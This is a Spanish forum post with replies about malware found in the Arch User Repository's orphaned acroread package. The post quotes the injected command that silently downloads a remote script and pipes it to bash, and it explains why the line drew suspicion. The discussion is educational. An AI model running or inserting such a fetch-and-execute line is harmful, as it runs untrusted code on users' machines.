Malware encontrado en repositorios comunitarios AUR para Arch Linux

[h]Se ha encontrado un malware en los repositorios AUR de Arch Linux
¿Qué pensar al respecto?[/h]
https://www.wifi-libre.com/img/members/3/aur_virus_2.jpg
Encontrar un virus en unos repositorios para distribución GNU-Linux es (afortunadamente) extremadamente raro.
Podemos hablar en este caso de un epifenómeno porque no estamos hablando de los repositorios “oficiales” de Arch Linux.
Los repositorios oficiales de Arch Linux, los que están mantenidos por el equipo de desarrollo, son los repositorios “pacman”.
Los repositorios AUR están mantenidos por la comunidad de usuarios de Arch Linux.
Es fundamental recordar esto: Usar otros repositorios que los repositorios de nuestra distribución supondrá siempre un riesgo.

Pasa lo mismo en debian (kali y ubuntu etc…) con los repositorios oficiales y los repositorios “ppa” (non oficiales) que podemos añadir para instalar una aplicación fuera de los repositorios de nuestra distribución.
Debemos hacerlo solo con software de confianza y personalmente prefiero prescindir totalmente de ellos, no añado ppa. .

El malware en cuestión ha sido introducido el 7 de julio por un tal xeactor
No era un malware dañino en si.
Tiraba de **curl **para mandar afuera información colectada sobre el ordenador.
Su **CPU **, entre otras cosas.
Era muy probablemente la fase uno del plan de xeactor
Se ha pillado a este mismo xeactor en el mercado android colocando malwares para minar bitcoins.
CPU - Bitcoins… ¡Elemental mi querido Watson! El muy listo colectaba información para infectar ordenadores con minadores de criptomonedas.

La pregunta que queda en suspenso es ¿Son seguros estos repositorios AUR?
Cabe decir que son los repositorios non-oficiales más seguros que haya (hablando de todas las distribuciones)
Será el primer caso de malware encontrado y se ha detectado de inmediato.
El paquete infectado se ha quedado tan solo 9 horas.
Lo que ha levantado sospechas es que en la ultima actualización del paquete se ha añadido un linea de código curl (utilidad para descargar o subir datos)
El paquete en cuestión se llama acroread.git y era orfanato, es decir, el paquete se ha marcado como obsoleto por un largo tiempo.
**Xeactor **ha aprovechado esto para hacerse por pasar por un buen samaritano que quería darle una segunda vida a este paquete.
Podéis ver a continuación la modificación que ha levantado sospechas:
https://www.wifi-libre.com/img/members/3/aur_virus_1.jpg

curl -s https://ptpb.pw/~x|bash -&

**curl **está invocado en modo “silencioso” (opción -s).
Se ejecuta un script en pipe sin saber los comandos empleados (wtf? uno :pam: ) y todo esto se hace desde/hacía una web externa con un dominio basura (wtf? dos :pam: )
Una de las grandes calidades de estos repositorios alternativos es que permiten revisar todos los cambios lo que hace imposible esconder algo mucho tiempo.
Hay que decir también que no creo que muchos tienen a este paquete viejo y sin interés, creo incluso que no ha recogido… ningunos datos.
Este paquete es para instalar… Adobe PDF reader en Linux (wtf? tres :smiley: )
Existen muchas alternativas de código libre y disponibles desde los repositorios oficiales,
Es bueno recordar que para nuestra seguridad debemos siempre privilegiar los softwares instalados desde nuestros repositorios oficiales y debemos siempre privilegiar las soluciones de código libre,

En todos casos este incidente no desacredita a los repositorios AUR ni mucho menos.
Siempre habrá un cretino (hay que ser un idiota para usar el mismo nick para atacar a dos objetivos diferentes :P) para intentar aprovecharse del funcionamiento abierto de unos repositorios comunitarios basados en la libre colaboración.
El malware estaba en un paquete muy viejo, sin mantenimiento desde tiempo, diseñado para una tarea… que no tiene sentido (¿Quien coño usa adobe pdf reaver en linux? :smiley: )
La reacción fue inmediata y el malware, es importante repetirlo, se quitó en menos de nueve horas.
Todo esto ilustra más bien la eficiencia y el nivel de seguridad insuperable del funcionamiento en código libre.
Los repositorios** AUR**, a pesar de ser abiertos y mantenido por la comunidad, son muchísimo, pero que muchísimo, más seguros que el mercado android que tiene a toda la maquinaría google detrás.

Referencias
[list=*]
]Malware Found On The Arch User Repository (AUR) @ linuxuprising.com/]
]¡Bienvenido al repositorio de usuarios de Arch! @ aur.archlinux.org/]
[/list]

Desgraciadamente nunca se está exento de idiotas. :expressionless:

Pero hay algo de esta noticia que no me deja buen sabor de boca,y es la facilidad que hay para meter virus en casi cualquier (cosa). :confused:

Cualquier cosa… ¡Menos unos repositorios oficiales GNU-Linux! :cool:
Imposible que pase algo similar por apt (si no añades ppa) (en debian y derivados) o mediante pacman (en arch linux).
Debería dejarte buen sabor en boca ver que unos repositorios comunitarios abiertos a tod@s son millones de veces más seguros que cualquier market google, windows o IOS. :wink:
El paquete malicioso era obsoleto, para una tarea idiota, se ha visto enseguida y estoy seguro que nadie ha sido afectado.
Lo que debería dejar mal sabor de boca es usar códigos cerrados dónde desconocemos del todo el código… La ilusión de seguridad es la peor cosa. Ver y entender es el mejor remedio.

Si, eso ya me quedo claro,pero seamos realistas,nadie nos puede garantizar la seguridad al 100%.